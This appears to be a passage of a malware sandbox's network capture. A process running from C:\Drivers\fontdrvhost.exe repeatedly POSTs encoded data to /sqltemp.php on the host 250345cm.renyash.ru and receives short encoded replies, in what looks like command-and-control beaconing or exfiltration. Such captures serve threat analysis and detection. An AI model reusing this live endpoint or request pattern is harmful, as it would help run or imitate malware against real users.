
Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49858	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:59.795131922 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:00.152175903 CET	1012	OUT	Data Raw: 56 51 5f 56 54 58 51 56 58 56 52 59 56 5b 59 52 5b 58 54 5b 55 5c 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_VTXQVXVRYV[YR[XT[U\P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X3,&4_$@/%V#-(8(.7 T#\<)E%,#V-&Y.,Y-)
Jan 1, 2025 14:53:00.242429018 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:00.417859077 CET	803	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9kGA2yTJB2sVfXlq1dUznFxUW%2Fo3QUxEfGl0eRcUnFqRPZO3wzocAxd7AdLmyZF76AnbwXvmT6VwHaPxYNdVSFzf4NskiRWtVmc1F6%2FrdC4KErYYes2Bc1teVimmigVtVG27EUvc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe383c3541df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2136&min_rtt=1854&rtt_var=1261&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=354627&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49864	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:00.545312881 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:00.902198076 CET	1012	OUT	Data Raw: 56 51 5f 51 51 5c 51 50 58 56 52 59 56 5e 59 50 5b 59 54 51 55 58 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_QQ\QPXVRYV^YP[YTQUXPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'/49_'>?E,)!W >0Y+9)8 27X+]61<;T:&Y.,Y-
Jan 1, 2025 14:53:01.042879105 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:01.250606060 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b0NB%2FDU2Ibj8SnEuObK3piZGsO46NvW3bCOU%2FXYec6u5%2F34RYzWzdgCZrXPjr9nzcFhWBvD2gKkd0dtIO60dbukloouhtpqVompcGpBAPQORUh7C%2BiMreh4LE4Wi5hg8AHH1J4io"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe3d2b278c3c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4470&min_rtt=1985&rtt_var=5714&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=66770&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49871	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:01.373091936 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:01.730480909 CET	1012	OUT	Data Raw: 56 52 5f 54 54 50 54 52 58 56 52 59 56 5e 59 5f 5b 5e 54 51 55 59 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VR_TTPTRXVRYV^Y_[^TQUYPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y0<: Y-]$X4;9!>,Z? (=777Z;C%<?S-&Y.,Y-
Jan 1, 2025 14:53:01.869383097 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:02.200321913 CET	812	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5cwsi%2FIU82eI%2FO1GP2xGG0VLEcl6VtB6%2F0HEbJ%2FHpjEXpi3Kvv1kokqFHkQxR9dYonvHxFxj4fNPB3NrnWBnjmOy%2B20F%2BssKWu7OVN7HtKQDm%2Fgb1j35J7rFtZtG3DFo8RTajxsv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe425c2f0c86-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3760&min_rtt=1918&rtt_var=4403&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=87661&cwnd=108&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49879	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:02.522223949 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:02.870881081 CET	1012	OUT	Data Raw: 56 5e 5f 5d 54 5b 54 53 58 56 52 59 56 5f 59 50 5b 5c 54 50 55 5a 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V^_]T[TSXVRYV_YP[\TPUZP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$<&43X$;:-U =<_7W*X+# <D&Y8,:&Y.,Y-9
Jan 1, 2025 14:53:02.981760979 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:03.178299904 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iD6Q0xkK6caC%2Btxik4h68LwqDRceglkEJxPcfakE%2FT5UHAvm%2BhxNT%2Bs9C%2FCC1jKafnFzN87JSToAwSEiuuJ%2F%2FQKjHP%2Blph3OyVqReLEiLhtNGXTY3gjI9D0%2FukDvI0uTSNIFEHiQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe495d2a0f39-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3000&min_rtt=1706&rtt_var=3228&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=121071&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49884	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:03.310058117 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:03.668241978 CET	1012	OUT	Data Raw: 56 53 5a 54 51 5d 51 50 58 56 52 59 56 58 59 51 5b 52 54 50 55 5b 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VSZTQ]QPXVRYVXYQ[RTPU[PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.&?6"<2'>;:=7+?(-'72$(+29&Y.,Y-%
Jan 1, 2025 14:53:03.753956079 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:04.063038111 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FA%2B80tcENM9T3pNRn3l%2BhLXNm85BHt2GaBafaLtyuHhrCYAyMqPJkyPZ5epunQqGwMUNwdkUk1HNT66e6CEiBnBfgzzoE2wJUcn5fD%2FrCDf6I8eTHJyztgSJ%2FaHhAhR3n4Pmz5MN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe4e2e0f42ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2511&min_rtt=1737&rtt_var=2201&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=183971&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49889	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:04.182439089 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:04.527276039 CET	1012	OUT	Data Raw: 53 54 5f 51 54 5c 54 57 58 56 52 59 56 5b 59 55 5b 5f 54 50 55 55 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: ST_QT\TWXVRYV[YU[_TPUUP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0!\"?&'$;). =+)7>7#<(52Y(.:&Y.,Y-)
Jan 1, 2025 14:53:04.646281958 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:04.815267086 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTLb4yeayiee1U%2B8spm9R8GRu1VtuHpqiKYVFY6Caca2AgjWkcoi6TQTgx6EuOShYje5ciAmCKg%2BIWCMsr%2FGUhE1XT0pdCiLXBWbEw75UTdM5ugUsH%2BMUTt73udXkGQqHCioxWwy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe53bc68424d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3945&min_rtt=1682&rtt_var=5157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=73778&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49896	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:05.166491032 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:05.512080908 CET	1012	OUT	Data Raw: 56 54 5a 57 54 5d 54 56 58 56 52 59 56 5c 59 54 5b 5b 54 5e 55 55 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VTZWT]TVXVRYV\YT[[T^UUPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$Z#<=^'.A;)9 > Y<93U)+#3Z?862'-&Y.,Y-5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49897	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:05.531423092 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:05.886569023 CET	1852	OUT	Data Raw: 56 51 5f 53 54 58 51 56 58 56 52 59 56 5c 59 56 5b 5b 54 5e 55 5d 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_STXQVXVRYV\YV[[T^U]PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3/#Y>'X ;)>70^(+U;!!?Y((%&,;V-&Y.,Y-5
Jan 1, 2025 14:53:06.000952005 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:06.180035114 CET	948	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AUsHUI%2BZbwJeteleSdfSHkwkox0n7VWKDj1zSIwZ9Wv6XjQBkBoM27kku97%2FdrQHfWP9b8dM7kQnCBv7K1SPB0yOiab2vvTOFOO8wRtSTmGNxDyprtocrCofT%2Bkg2v76XzZmnBy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe5c3b3017e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6308&min_rtt=3770&rtt_var=6490&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=60641&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 1c 29 2e 3e 57 32 0c 24 59 3c 13 3b 52 31 07 29 01 29 38 21 04 30 3e 27 10 29 29 0a 00 21 05 32 02 24 38 30 5f 37 5b 30 03 25 34 2b 59 05 1c 23 1a 23 3f 01 00 2a 2d 30 05 26 06 31 13 24 10 28 58 2b 38 28 1c 37 3b 0d 58 24 13 38 13 3d 3a 20 56 26 2f 23 14 2d 06 35 54 24 10 2c 54 00 11 26 51 25 31 28 1b 20 0e 2c 12 22 1f 26 01 32 1a 32 56 26 12 23 51 21 2a 3e 5c 26 22 3b 1d 23 23 2e 59 31 15 2d 10 23 13 0d 52 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a Data Ascii: 98%).>W2$Y<;R1))8!0>'))!2$80_7[0%4+Y##?-0&1$(X+8(7;X$8=: V&/#-5T$,T&Q%1( ,"&22V&#Q!>\&";##.Y1-#R=>%S -H?WS
Jan 1, 2025 14:53:06.270431995 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49902	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:05.697575092 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:06.042821884 CET	1012	OUT	Data Raw: 53 54 5a 50 54 5c 51 55 58 56 52 59 56 5c 59 5e 5b 59 54 5e 55 58 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: STZPT\QUXVRYV\Y^[YT^UXPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3,=7/%Y3<,9"#8_*+WX<Z#1(*+@%;W9:&Y.,Y-5
Jan 1, 2025 14:53:06.160497904 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:06.416774988 CET	812	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SXB%2BznpxfT7UvdKCPqllBlcBWaBp%2BkXgAWFEMckdIsRi%2BjlZAkPB%2BGvonFOrtCAan2LKbEg1dbeMnz4uenogFYLsPqPSqc7E%2Bc8IWb%2BTp9BNAb2dkhpEEmKne7oL9xfIkB9W%2BMjt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe5d3e8f42c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4237&min_rtt=1817&rtt_var=5522&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=68932&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49908	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:06.541202068 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue
Jan 1, 2025 14:53:06.886646032 CET	1008	OUT	Data Raw: 56 5f 5a 56 54 5c 51 55 58 56 52 59 56 59 59 51 5b 5f 54 50 55 5f 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V_ZVT\QUXVRYVYYQ[_TPU_P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0=\7=0.;D82 8X(9#U>? $<2Y;.&Y.,Y-9
Jan 1, 2025 14:53:07.004755974 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:07.271003008 CET	804	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAf5PqMewuOgquoZt4A8UITsOANHEtslBj3ofs1b5yLWXgDSGjvGidZj9VDplw6%2FdOGAuIkfbTgqTsOGth8cEc1NGxGLpbYw2qDXw%2BB2a%2B1JQHzKYm0QEjarU2SQxKGan0ymsC7d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe627b914402-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4048&min_rtt=1701&rtt_var=5332&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1303&delivery_rate=71299&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49914	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:07.410691023 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:07.761712074 CET	1012	OUT	Data Raw: 56 51 5a 51 54 5a 54 54 58 56 52 59 56 5c 59 5f 5b 5e 54 59 55 5a 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQZQTZTTXVRYV\Y_[^TYUZP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/:7,9$.8/:9 .<^('S(-8[7'(62:&Y.,Y-5
Jan 1, 2025 14:53:07.882718086 CET	25	IN	HTTP/1.1 100 Continue
